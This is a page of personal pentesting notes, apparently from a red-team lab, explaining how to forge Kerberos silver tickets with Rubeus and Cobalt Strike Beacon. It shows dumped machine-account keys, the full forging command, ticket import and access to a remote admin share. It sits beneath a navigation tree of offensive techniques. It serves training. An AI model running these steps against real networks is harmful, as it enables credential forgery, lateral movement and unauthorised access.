What is this changing
Notes
NotesSome other stuff
test
Notes
NotesSome other stuff
  • Mixing...
  • General
    • Transferring Files
      • Serving Your Files
      • Transferring Files To Linux
      • Transferring Files To Windows
    • File Types
      • .vhd
    • Password Cracking
      • Hashcat
        • Wordlists
        • Wordlist + Rules
        • Masks
        • Mask Files
        • Combinator
        • Hybrid
        • Keyboard Walks
    • Trash to sift through
      • Cookie 3.1.24.ctd
  • OSINT
  • Enumeration
  • Web Applications
    • Web Vulnerabilities
      • Web App Red Team Checklist
      • SSRF (Server Side Request Forgery)
      • Blind Data Exfiltration via DNS
      • XSS
      • XXE
      • XPath Injection
    • APIs
      • Web API Indicators
      • Passive Reconnaissance
      • Active API Reconnaissance
  • Active Directory
    • Reconnaissance
      • PowerView
      • SharpView
      • ADSearch
    • User Impersonation
      • Pass the Hash
      • Pass the Ticket
      • Overpass the Hash
      • Token Impersonation
      • Token Store
      • Make Token
      • Process Injection
    • Lateral Movement
      • Windows Remote Management
      • PsExec
      • Windows Management Instrumentation (WMI)
      • CoInitializeSecurity
      • DCOM
    • Kerberos
      • Kerberoasting
      • ASREP Roasting
      • Unconstrained Delegation
      • Constrained Delegation
      • Alternate Service Name
      • S4U2Self Abuse
      • Resource-Based Constrained Delegation
      • Shadow Credentials
      • Kerberos Relay Attacks
    • Pivoting
      • SOCKS Proxies
      • Linux Tools For Proxies
      • Windows Tools For Proxies
      • Pivoting with Kerberos
      • Pivoting A Browser
      • Reverse Port Forwards
      • NTLM Relaying
      • Relaying WebDAV
    • AD Certificate Services
      • Find Certificate Authorities
      • Misconfigured Certificate Templates
      • NTLM Relaying to ADCS HTTP Endpoints
      • User & Computer Persistence
    • Group Policy
      • Modify Existing GPO
      • Create & Link a GPO
    • MS SQL Servers
      • MS SQL Impersonation
      • MS SQL Command Execution
      • MS SQL Lateral Movement
      • MS SQL Privilege Escalation
    • Configuration Manager
      • Enumeration
      • Network Access Account Credentials
      • Lateral Movement
    • Domain Dominance
      • Silver Tickets
      • Golden Ticket
      • Diamond Tickets
      • Forged Certificates
    • Forest & Domain Trusts
      • Parent/Child
      • One-Way Inbound
      • One-Way Outbound
    • LAPS (Local Administrator Password Solution)
      • Reading ms-Mcs-AdmPwd
      • Password Expiration Protection
      • LAPS Backdoors
  • Report Writing
    • Wireless Pentesting
  • Cobalt Strike
    • Starting
      • Start CS as a Service
      • Listener Management
      • Generating Payloads
      • Pivot Listeners
    • Take Screenshot
    • Mimikatz
      • NTLM Hashes
      • Kerberos Encryption Keys
      • Security Account Manager
      • Domain Cached Credentials
    • Extracting Kerberos Tickets
    • DCSync
    • Session Passing
      • Beacon Passing
      • Foreign Listener
      • Spawn & Inject
    • Credentials
      • Credential Manager
      • Scheduled Task Credentials
    • Evading Windows Defender
      • Artifact Kit
      • Malleable C2
      • Resource Kit
      • AMSI vs Post-Exploitation
      • Manual AMSI Bypasses
      • Behavioural Detections
      • Parent/Child Relationships
      • Command Line Detections
    • Application Whitelisting
      • Policy Enumeration
      • Writeable Paths
      • Binaries, Scripts, and Libraries
      • PowerShell CLM
      • Beacon DLL
Powered by GitBook
On this page
Edit on GitHub

Last updated 4 days ago

A "silver ticket" is a forged service ticket, signed using the secret material (RC4/AES keys) of a computer account. You may forge a TGS for any user to any service on that machine, which is useful for short/medium-term persistence. By default, computer passwords change every 30 days, at which time you must re-obtain the new secrets to continue making silver tickets. Both silver and golden (coming up next) tickets are forged, so can be generated on your own machine and imported into your Beacon session for use.

Let's say we dumped Kerberos keys from Workstation 1 from a SYSTEM Beacon.

On your Windows attacking machine, use Rubeus to forge a service ticket for nlamb and the CIFS service.

Then import the ticket.

Here are some useful ticket combinations:

Technique

Required Service Tickets

psexec

HOST & CIFS

winrm

HOST & HTTP

dcsync (DCs only)

LDAP

Session           : Service from 0
User Name         : WKSTN-1$
Domain            : DEV
Logon Server      : (null)
Logon Time        : 10/17/2023 10:31:24 AM
SID               : S-1-5-20

	 * Username : wkstn-1$
	 * Domain   : DEV.CYBERBOTIC.IO
	 * Password : (null)
	 * Key List :
	   des_cbc_md4       3ad3ca5c512dd138e3917b0848ed09399c4bbe19e83efe661649aa3adf2cb98f
	   des_cbc_md4       5192c07ee06e9264f0a7d7af5e645448
	   des_cbc_md4       5192c07ee06e9264f0a7d7af5e645448
	   des_cbc_md4       5192c07ee06e9264f0a7d7af5e645448
	   des_cbc_md4       5192c07ee06e9264f0a7d7af5e645448
	   des_cbc_md4       5192c07ee06e9264f0a7d7af5e645448
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/wkstn-1.dev.cyberbotic.io /aes256:3ad3ca5c512dd138e3917b0848ed09399c4bbe19e83efe661649aa3adf2cb98f /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap

[*] Action: Build TGS

[*] Building PAC

[*] Domain         : DEV.CYBERBOTIC.IO (DEV)
[*] SID            : S-1-5-21-569305411-121244042-2357301523
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : C9E598CD2A9B08FE31936F2C1846A8365D85147F75B8000CBC90E3C9DE50FCC7
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : C9E598CD2A9B08FE31936F2C1846A8365D85147F75B8000CBC90E3C9DE50FCC7
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : cifs
[*] Target         : wkstn-1.dev.cyberbotic.io

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'nlamb' to 'cifs/wkstn-1.dev.cyberbotic.io'

[*] AuthTime       : 9/9/2022 10:49:41 AM
[*] StartTime      : 9/9/2022 10:49:41 AM
[*] EndTime        : 9/9/2022 8:49:41 PM
[*] RenewTill      : 9/16/2022 10:49:41 AM

[*] base64(ticket.kirbi):

      doIFXD[...]MuaW8=
beacon> getuid
[*] You are DEV\bfarmer (admin)

beacon> ls \\wkstn-1.dev.cyberbotic.io\c$
[-] could not open \\wkstn-1.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFXD[...]MuaW8=

[*] Using DEV\nlamb:FakePass

[*] Showing process : False
[*] Username        : nlamb
[*] Domain          : DEV
[*] Password        : FakePass

[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 5668
[+] Ticket successfully imported!
[+] LUID            : 0x423091

beacon> steal_token 5668
[+] Impersonated DEV\bfarmer

beacon> ls \\wkstn-1.dev.cyberbotic.io\c$
[*] Listing: \\wkstn-1.dev.cyberbotic.io\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/16/2022 08:17:30   $Recycle.Bin
          dir     08/15/2022 22:22:31   $WinREAgent
          dir     01/27/2022 18:18:49   Documents and Settings
          dir     12/07/2019 09:14:52   PerfLogs
          dir     08/22/2022 00:15:03   Program Files
          dir     10/06/2021 13:57:25   Program Files (x86)
          dir     09/08/2022 13:58:46   ProgramData
          dir     08/17/2022 17:52:54   Recovery
          dir     09/06/2022 08:17:28   System Volume Information
          dir     08/16/2022 08:15:58   Users
          dir     09/09/2022 10:38:50   Windows
 8kb      fil     09/09/2022 08:37:00   DumpStack.log.tmp
 796mb    fil     09/09/2022 08:37:00   hiberfil.sys
 704mb    fil     09/09/2022 08:37:00   pagefile.sys
 16mb     fil     09/09/2022 08:37:00   swapfile.sys
PreviousDomain DominanceNextGolden Ticket
  1. Active Directory
  2. Domain Dominance

Silver Tickets